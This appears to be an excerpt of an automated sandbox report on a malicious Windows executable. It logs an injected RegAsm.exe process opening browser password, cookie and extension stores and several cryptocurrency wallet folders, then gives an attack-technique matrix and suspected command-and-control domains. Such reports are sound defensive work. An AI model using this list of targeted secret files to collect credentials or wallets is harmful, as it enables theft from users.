        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5104, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        411
        Process Injection
        11
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        411
        Process Injection
        LSASS Memory131
        Security Software Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Deobfuscate/Decode Files or Information
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares31
        Data from Local System
        113
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object Model2
        Clipboard Data
        Protocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets11
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials33
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        PASS-1234.exe34%VirustotalBrowse
        PASS-1234.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        sideindexfollowragelrew.pw24%VirustotalBrowse
        productivelookewr.shop1%VirustotalBrowse
        SourceDetectionScannerLabelLink
        demonstationfukewko.shop1%VirustotalBrowse
        sideindexfollowragelrew.pw24%VirustotalBrowse
        incredibleextedwj.shop1%VirustotalBrowse
        tolerateilusidjukl.shop14%VirustotalBrowse
        liabilitynighstjsko.shop1%VirustotalBrowse
        https://productivelookewr.shop/api14%VirustotalBrowse
        shortsvelventysjo.shop1%VirustotalBrowse
        https://productivelookewr.shop/apis10%VirustotalBrowse
        alcojoldwograpciw.shop1%VirustotalBrowse
        productivelookewr.shop1%VirustotalBrowse
        shatterbreathepsw.shop1%VirustotalBrowse
        https://productivelookewr.shop/0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        productivelookewr.shop
        104.21.11.250
        truetrueunknown
        sideindexfollowragelrew.pw
        unknown
        unknowntrueunknown
        NameMaliciousAntivirus DetectionReputation
        demonstationfukewko.shoptrueunknown
        incredibleextedwj.shoptrueunknown
        sideindexfollowragelrew.pwtrueunknown
        shortsvelventysjo.shoptrueunknown
        shatterbreathepsw.shoptrueunknown
        productivelookewr.shoptrueunknown
        tolerateilusidjukl.shoptrueunknown
        liabilitynighstjsko.shoptrueunknown
        https://productivelookewr.shop/apifalseunknown
        alcojoldwograpciw.shoptrueunknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://productivelookewr.shop/RegAsm.exe, 00000001.00000002.1747903838.0000000001562000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.1747804223.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.1747804223.00000000014F0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://productivelookewr.shop/apisRegAsm.exe, 00000001.00000002.1748220978.00000000037C9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        104.21.11.250
        productivelookewr.shopUnited States
        13335CLOUDFLARENETUStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1429198
        Start date and time:2024-04-21 09:04:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 22s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:2
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PASS-1234.exe
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@3/0@2/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 96%
        • Number of executed functions: 27
        • Number of non-executed functions: 82
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Stop behavior analysis, all processes terminated
        • Excluded IPs from analysis (whitelisted): 40.126.28.12, 40.126.28.19, 40.126.7.35, 40.126.28.13, 40.126.28.20, 40.126.28.14, 40.126.28.23, 40.126.7.32
        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, umwatson.events.data.microsoft.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        09:04:56API Interceptor7x Sleep call for process: RegAsm.exe modified
        No context
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
        • 172.67.163.209
